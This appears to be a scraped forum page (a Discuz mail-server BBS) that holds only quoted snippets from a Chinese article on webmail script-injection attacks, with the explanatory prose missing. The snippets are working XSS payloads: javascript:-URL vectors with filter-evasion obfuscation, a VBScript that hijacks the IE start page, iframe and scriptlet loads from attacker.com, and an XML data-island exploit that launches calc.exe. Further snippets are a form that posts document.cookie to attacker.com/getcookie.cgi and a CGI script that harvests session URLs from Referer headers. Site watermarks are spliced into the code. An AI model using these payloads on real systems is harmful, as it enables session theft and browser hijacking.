| 以下为引用的内容: <scriptlanguage="JavaScript"> <!-- while(true) { window.open("URI");//如果URI就是当前页本身,那就更具破坏性。 } //--> </script> |
| 以下为引用的内容: Www^Chinaz^com <scriptlanguage="VBScript"> SetRegWsh=CreateObject("WScript.Shell") '设置IE浏览器默认页 RegWsh.RegWrite"HKCU\Software\Microsoft\InternetExplorer\Main\StartPage","http://ww-w.attacker.com" </script> |
| 以下为引用的内容: <body> <ahref="#">Clickhere</a> <formmethod="post"action="#"> 中国站.长.站 <inputtype="submit"value="Submit"> </form> </body> |
| 以下为引用的内容: <bodybackground="javascript:alert('JavaScript#1isexecuted');"> <ahref="javascript:alert('JavaScript#2isexecuted');">Clickhere</a> <formmethod="post"action="javascript:alert('JavaScript#3isexecuted');"> <inputtype="submit"value="Submit"> </form> <imgsrc="javascript:alert('JavaScript#4isexecuted');"> </body> |
| 以下为引用的内容: <body> <imglowsrc="ja;vasC;ript:alert('JavaScript#1isexecuted')"> <ahref="j;avA;sC;ript:;aler;t('JavaScript#2 i;ܾxecuted')">Clickhere;</a> <formmethod="post"action="javascript:alert('JavaScript#3is executed')"> <inputtype="S;ubmit"value="Submit"> Chinaz </form> </body> |
| 以下为引用的内容: 例如:<styletype="text/css"> <!-- @importurl(javascript:alert('JavaScript#1isexecuted')); @importurl(http://www.attacker.com/js.css); --> </style> |
| 以下为引用的内容: @importurl(javascript:alert('JavaScript#2isexecuted')); @importurl(javascript:eval(String.fromCharCode (97,108,101,114,116,40,39,84,101,115,116,32,49,39,41,59,97, 108,101,114,116,40,39,84,101,115,116,32,50,39,41,59))); |
| 以下为引用的内容: <body> <metahttp-equiv="refresh"c> </body> |
| 以下为引用的内容: <body> <iframesrc="http://www.attacker.com/import.htm"frameborder="0"></iframe> </body> |
| 以下为引用的内容: <body> <objecttype="text/x-scriptlet"data="http://www.attacker.com/import.htm"></object> </body> |
| 以下为引用的内容: <spandatasrc="#oExec"datafld="exploit"dataformatas="html"></span> <xmlid="oExec"> <security> <exploit> <![CDATA[ <objectid="oFile"classid="clsid:11111111-1111-1111-1111- 中国站长.站 111111111111"codebase="c:/winnt/system32/calc.exe"></object> ]]> </exploit> </security> </xml> |
| 以下为引用的内容: <body> <formmethod="post"action="http://attacker.com/getcookie.cgi"name="myform"> <inputname="session"type="hidden"> </form> <scriptlanguage="JavaScript"> varcookie=(document.cookie); alert(cookie);//这一句用于显示当前cookie信息,当然,攻击者不会这样做。 document.myform.session.value=cookie; Chinaz~com document.myform.submit(); </script> |
| 以下为引用的内容: <objectid="data"data="empty.html"type="text/html"></object> <script> varref=document.getElementById("data").object; ref.location.href="http://www.anydomain.com"; setTimeout("alert(ref.cookie)",5000); </script> |
| 以下为引用的内容: http://bjweb.163.net/cgi/ldapapp?funcid=main&sid=HAPGfUDusCLAQSIm http://WebMail.21cn.com/extend/gb/std/username/ NV0416qxMftyKnOcavGDktOmIEvPsb/SignOn.gen |
| 以下为引用的内容: #!/bin/sh #set-f echoContent-type:text/plain echo #写入日志,geturl.log文件权限要可写 echo"`date`$REMOTE_ADDR$HTTP_REFERER">>/var/log/geturl.log #即时通知攻击者 wall"`date`收到WebMailurl,请检查日志" 站.长站 #返回给客户端的信息,用于迷惑用户 echo"你好!" |
| 以下为引用的内容: LogFormat"%t%h%{Referer}i->%U"referer CustomLog/usr/local/apache/logs/referer_logreferer |
| 欢迎光临 邮件服务器-邮件系统-邮件技术论坛(BBS) (http://bbs.5dmail.net/) | Powered by Discuz! X3.2 |